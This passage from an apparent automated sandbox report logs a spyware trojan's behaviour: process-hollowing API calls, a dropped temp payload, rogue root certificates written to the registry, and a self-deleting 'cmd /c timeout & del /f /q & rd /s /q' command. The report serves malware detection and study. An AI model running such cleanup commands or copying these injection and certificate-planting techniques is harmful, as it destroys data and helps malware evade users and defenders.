                      Source: C:\Users\user\Desktop\82xul16VKj.exeCode function: 0_2_02EEBEF0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02EEBEF0
                      Source: C:\Users\user\Desktop\82xul16VKj.exeCode function: 0_2_02EEB250 NtCreateFile,CreateFileMappingA,CreateFileMappingA,MapViewOfFile,CloseHandle,0_2_02EEB250
                      Source: C:\Users\user\Desktop\82xul16VKj.exeCode function: 0_2_02EEB510 NtProtectVirtualMemory,NtProtectVirtualMemory,0_2_02EEB510
                      Source: C:\Users\user\Desktop\82xul16VKj.exeCode function: 0_2_02EEC5100_2_02EEC510
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D744CF02_2_1D744CF0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D761C502_2_1D761C50
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D899CC02_2_1D899CC0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73292D2_2_1D73292D
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7312A82_2_1D7312A8
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D732AA92_2_1D732AA9
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7E59402_2_1D7E5940
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D731C9E2_2_1D731C9E
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D859A202_2_1D859A20
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7320182_2_1D732018
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73D4C02_2_1D73D4C0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D8994302_2_1D899430
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7ED6D02_2_1D7ED6D0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7D96902_2_1D7D9690
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7490002_2_1D749000
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D8550402_2_1D855040
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7335802_2_1D733580
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7C53B02_2_1D7C53B0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D90D2092_2_1D90D209
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D758D2A2_2_1D758D2A
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D76CE102_2_1D76CE10
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73C8002_2_1D73C800
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D731EF12_2_1D731EF1
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D834A602_2_1D834A60
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D8704802_2_1D870480
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7587632_2_1D758763
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7947602_2_1D794760
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7C87602_2_1D7C8760
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7586802_2_1D758680
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7B81202_2_1D7B8120
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D8580302_2_1D858030
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7B00902_2_1D7B0090
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D733AB22_2_1D733AB2
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73290A2_2_1D73290A
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73251D2_2_1D73251D
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7678102_2_1D767810
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D75BAB02_2_1D75BAB0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73F1602_2_1D73F160
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73174E2_2_1D73174E
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7633702_2_1D763370
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7319DD2_2_1D7319DD
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D90AEBE2_2_1D90AEBE
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D792EE02_2_1D792EE0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D776E802_2_1D776E80
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D8169C02_2_1D8169C0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D84A9002_2_1D84A900
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D82A9402_2_1D82A940
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73481D2_2_1D73481D
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D86E8002_2_1D86E800
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D733E3B2_2_1D733E3B
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73AA402_2_1D73AA40
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73EA802_2_1D73EA80
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D82A5902_2_1D82A590
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D75A5602_2_1D75A560
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7347AF2_2_1D7347AF
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7466C02_2_1D7466C0
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73209F2_2_1D73209F
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7BA0B02_2_1D7BA0B0
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\kat2B07.tmp 6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: String function: 1D73395E appears 81 times
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: String function: 1D733AF3 appears 37 times
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: String function: 1D731F5A appears 36 times
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: String function: 1D9106B1 appears 36 times
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: String function: 1D73415B appears 173 times
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: String function: 1D731C2B appears 47 times
                      Source: 82xul16VKj.exe, 00000000.00000002.342118140.000000000018D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
                      Source: 82xul16VKj.exe, 00000000.00000002.342285744.0000000000324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
                      Source: 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
                      Source: 82xul16VKj.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/14@4/4
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\C7GDP0V0.txtJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeFile created: C:\Users\user\AppData\Local\Temp\kat2B07.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................T.A..........4Z.............P..............._B.s.....4Z.......4.t...........0.......................X.................A.....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................W.a.i.t.i.n.g. .f.o.r. .1.0...p........,......................0...............................................Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .9.(.P.....................d........-......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .8.(.P.............................q/......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .7.(.P............................../......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .6.(.P..............................0......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .5.(.P..............................0......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .4.(.P..............................1......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .3.(.P..............................2......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .2.(.P.....................,.......-3......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .1.(.P..............................3......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .0.(.P.....................,........3......................e. ........................................s....Jump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: .................................... .0.(.P..............................5......................e. ........................................s....Jump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                      Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                      Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                      Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: 82xul16VKj.exeVirustotal: Detection: 39%
                      Source: unknownProcess created: C:\Users\user\Desktop\82xul16VKj.exe "C:\Users\user\Desktop\82xul16VKj.exe"
                      Source: C:\Users\user\Desktop\82xul16VKj.exeProcess created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                      Source: C:\Users\user\Desktop\82xul16VKj.exeProcess created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exitJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: wow64win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: credssp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: cryptnet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: sensapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: devrtl.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: wbemcomn2.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: 82xul16VKj.exeStatic file information: File size 1608192 > 1048576
                      Source: 82xul16VKj.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x12a000
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr
                      Source: sqlt[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\82xul16VKj.exeCode function: 0_2_02EECA10 push edx; ret 0_2_02EECC1F
                      Source: C:\Users\user\Desktop\82xul16VKj.exeCode function: 0_2_02EEC310 push edx; ret 0_2_02EEC31B
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D731BF9 push ecx; ret 2_2_1D8D4C03
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7310C8 push ecx; ret 2_2_1D933552

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\82xul16VKj.exeFile created: C:\Users\user\AppData\Local\Temp\kat2B07.tmpJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon.png
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
